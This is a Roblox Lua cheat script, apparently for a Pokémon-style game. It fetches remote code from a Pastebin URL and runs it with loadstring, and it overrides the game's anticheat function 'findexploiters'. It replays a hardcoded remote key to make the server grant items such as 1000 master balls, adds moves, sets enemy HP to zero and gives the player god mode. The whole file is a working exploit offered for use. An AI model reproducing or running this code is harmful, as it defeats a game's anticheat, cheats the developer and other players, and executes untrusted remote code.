local Player = game.Players.LocalPlayer
local ReplicatedStorage = game.ReplicatedStorage
local REvents = ReplicatedStorage.REvents

local RemoteKey = "\240\159\145\169\226\128\141\226\156\148\240\159\144\177\226\128\141\240\159\145\147\240\159\152\137\240\159\152\137\240\159\145\169\226\128\141\240\159\154\146\240\159\152\152\240\159\145\168\226\128\141\240\159\154\128\240\159\164\162\240\159\164\148\240\159\152\134\226\156\168\226\156\168\240\159\152\130\240\159\146\150\240\159\142\133\240\159\145\169\226\128\141\226\156\148\240\159\144\177\226\128\141\240\159\145\147\240\159\152\137\240\159\152\137\240\159\145\169\226\128\141\240\159\154\146\240\159\152\152\240\159\145\168\226\128\141\240\159\154\128\240\159\164\162\240\159\164\148\240\159\152\134\226\156\168\226\156\168\240\159\152\130\240\159\146\150\240\159\142\133\240\159\145\169\226\128\141\226\156\148\240\159\144\177\226\128\141\240\159\145\147\240\159\152\137\240\159\152\137\240\159\145\169\226\128\141\240\159\154\146\240\159\152\152\240\159\145\168\226\128\141\240\159\154\128\240\159\164\162\240\159\164\148\240\159\152\134\226\156\168\226\156\168\240\159\152\130\240\159\146\150\240\159\142\133\240\159\145\169\226\128\141\226\156\148\240\159\144\177\226\128\141\240\159\145\147\240\159\152\137\240\159\152\137\240\159\145\169\226\128\141\240\159\154\146\240\159\152\152\240\159\145\168\226\128\141\240\159\154\128\240\159\164\162\240\159\164\148\240\159\152\134\226\156\168\226\156\168\240\159\152\130\240\159\146\150\240\159\142\133\240\159\145\169\226\128\141\226\156\148\240\159\144\177\226\128\141\240\159\145\147\240\159\152\137\240\159\152\137\240\159\145\169\226\128\141\240\159\154\146\240\159\152\152\240\159\145\168\226\128\141\240\159\154\128\240\159\164\162\240\159\164\148\240\159\152\134\226\156\168\226\156\168\240\159\152\130\240\159\146\150\240\159\142\133\240\159\145\169\226\128\141\226\156\148\240\159\144\177\226\128\141\240\159\145\147\240\159\152\137\240\159\152\137\240\159\145\169\226\128\141\240\159\154\146\240\159\152\152\240\159\145\168\226\128\141\240\159\154\128\240\159\164\162\240\159\164\148\240\159\152\134\226\156\168\226\156\168\240\159\152\130\240\159\146\150\240\159\142\133\240\159\145\169\226\128\141\226\156\148\240\159\144\177\226\128\141\240\159\145\147\240\159\152\137\240\159\152\137\240\159\145\169\226\128\141\240\159\154\146\240\159\152\152\240\159\145\168\226\128\141\240\159\154\128\240\159\164\162\240\159\164\148\240\159\152\134\226\156\168\226\156\168\240\159\152\130\240\159\146\150\240\159\142\133\240\159\145\169\226\128\141\226\156\148\240\159\144\177\226\128\141\240\159\145\147\240\159\152\137\240\159\152\137\240\159\145\169\226\128\141\240\159\154\146\240\159\152\152\240\159\145\168\226\128\141\240\159\154\128\240\159\164\162\240\159\164\148\240\159\152\134\226\156\168\226\156\168\240\159\152\130\240\159\146\150\240\159\142\133"
local Alert = require(ReplicatedStorage.Information.Notify)
local Math = require(ReplicatedStorage.Functions.Math)

loadstring(game:HttpGet("https://pastebin.com/raw/cwDSpepQ", true))()

local Window = library:AddWindow("Lol")
local ModifyingPokemonTab = Window:AddTab("Pokemon Modifying")
local PokemonBattleTab = Window:AddTab("In Battle")

--// AC BYPASS

local BlockFunctions = {
    "findexploiters",
}

for Index, FunctionName in next, BlockFunctions do
    getsenv(Player.PlayerGui["_G.Battle"])[FunctionName] = function()
        print("Anticheat tried doing anticheat stuff :upside_down:")
    end
end

--// adding items to your bag
local AddItemsFolder = ModifyingPokemonTab:AddFolder("Add items to your bag")
local SelectedItem
local ItemPlace
local SelectedItemAmount

AddItemsFolder:AddTextBox("Item to add: ", function(Value)
    SelectedItem = Value
end)
local AddItemDropdown = AddItemsFolder:AddDropdown("Where to add item: ", function(Value)
    ItemPlace = Player.Bag:FindFirstChild(Value)
end)
for Index, Value in next, Player.Bag:GetChildren() do
    AddItemDropdown:Add(Value)
end
AddItemsFolder:AddTextBox("Amount of item to add: ", function(Value)
    SelectedItemAmount = tonumber(Value)
end)
AddItemsFolder:AddButton("Add Item", function()
    game.REvents.Pokemon.ozAxZ:InvokeServer(SelectedItem, ItemPlace, SelectedItemAmount, RemoteKey)
end)

--// adding moves to pokemon
local AddMoveFolder = ModifyingPokemonTab:AddFolder("Modify your pokemons moves")
local SelectedPokemon
local SelectedMove

local YourPokemon = AddMoveFolder:AddDropdown("Pokemon to modify: ", function(Value)
    SelectedPokemon = Player.PokemonParty:FindFirstChild(Value)
end) --The contents of this dropdown gets added by the GodMode stuffs
AddMoveFolder:AddTextBox("Name of move to add: ", function(Value)
    SelectedMove = Value
end)
AddMoveFolder:AddButton("Add Move", function()
    REvents.Pokemon.createMove:FireServer(SelectedPokemon, SelectedMove)
end)
AddMoveFolder:AddButton("Clear all moves of pokemon", function()
    alert("not addet yet but soon")
end)

--// the three most common "stuff"
local CommonStuffFolder = ModifyingPokemonTab:AddFolder("Most common stuff to add")

CommonStuffFolder:AddButton("Get 1000x master balls", function(Value)
    REvents.Pokemon.ozAxZ:InvokeServer("Master Ball", Player.Bag.Pokeballs, 1000, RemoteKey)
end)
CommonStuffFolder:AddButton("Get 1000x dark skinifiers", function(Value)
    REvents.Pokemon.ozAxZ:InvokeServer("Dark Skinifier", Player.Bag.Evolution, 1000, RemoteKey)
end)
CommonStuffFolder:AddButton("Get 1000x shinifiers", function(Value)
    REvents.Pokemon.ozAxZ:InvokeServer("Shinifier", Player.Bag.Evolution, 1000, RemoteKey)
end)

--// IN BATTLE TAB

local DoGodMode = true
local GodModeSwitch = PokemonBattleTab:AddSwitch("God mode in battle", function(Value)
    DoGodMode = Value
end)
GodModeSwitch:Set(true)

PokemonBattleTab:AddButton("Kill all enemy pokemon in battle", function(Value)
    for Index, Pokemon in next, Player.OppPokemon:GetChildren() do
        Pokemon.CurrentHP.Value = 0
    end
    Alert:alert({
        text = "Just use one move and the battle will be over :]"
    }, 5)
end)

local function GodMode(Pokemon)
    if DoGodMode then
        Pokemon:WaitForChild("CurrentHP").Value = Pokemon.Stats.HPStat.Value
    end
end

for Index, Pokemon in next, Player.PokemonParty:GetChildren() do
    YourPokemon:Add(Pokemon)
    Pokemon:WaitForChild("CurrentHP"):GetPropertyChangedSignal("Value"):Connect(function()
        GodMode(Pokemon)
    end)
end

Player.PokemonParty.ChildAdded:Connect(function(Child)
    YourPokemon:Add(Child)
    Child:WaitForChild("CurrentHP"):GetPropertyChangedSignal("Value"):Connect(function()
        GodMode(Child)
    end)
end)
